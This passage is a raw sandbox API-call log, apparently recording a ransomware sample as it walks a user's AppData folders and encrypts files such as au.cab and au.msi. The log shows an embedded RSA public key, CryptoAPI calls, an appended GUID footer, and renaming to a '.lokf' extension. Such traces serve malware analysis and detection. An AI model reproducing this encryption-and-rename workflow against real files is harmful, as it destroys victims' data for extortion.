lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.277] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\") returned="Services\\" [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.277] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b88b8 [0061.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.278] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0061.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b88b8 | out: hHeap=0x660000) returned 1 [0061.278] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0061.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.278] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86da0 [0061.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0061.278] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86da0 | out: hHeap=0x660000) returned 1 [0061.278] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.278] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.278] PathFindFileNameW (pszPath="") returned="" [0061.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.278] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.279] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.279] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.279] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.279] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b88b8 [0061.279] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0061.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\") returned="AU\\" [0061.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0061.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0061.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0061.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0061.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.280] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0061.280] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86da0 [0061.280] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0061.280] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.280] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.280] PathFindFileNameW (pszPath="") returned="" [0061.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0061.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.281] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.281] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x8e062, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.cab", cAlternateFileName="")) returned 1 [0061.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0061.281] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned=".cab" [0061.281] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.282] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=581730) returned 1 [0061.282] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.284] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8e03c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.284] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.286] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x25805, lpOverlapped=0x0) returned 1 [0061.288] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.288] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.288] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.288] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8698) returned 1 [0061.289] CryptCreateHash (in: hProv=0x6b8698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.289] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.289] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.289] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.289] GetLastError () returned 0x0 [0061.289] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.289] CryptReleaseContext (hProv=0x6b8698, dwFlags=0x0) returned 1 [0061.289] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.289] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.289] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.290] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.291] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8e062, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.291] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0061.291] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.291] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.291] CloseHandle (hObject=0x5cc) returned 1 [0061.299] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.lokf")) returned 1 [0061.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.299] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.299] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0061.300] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 1 [0061.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0061.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0061.300] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0061.301] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned=".msi" [0061.301] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.301] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=185344) returned 1 [0061.301] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.303] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x2d3da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.303] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.305] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.305] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x25805, lpOverlapped=0x0) returned 1 [0061.308] lstrlenA (lpString="-----BEGIN PUBLIC 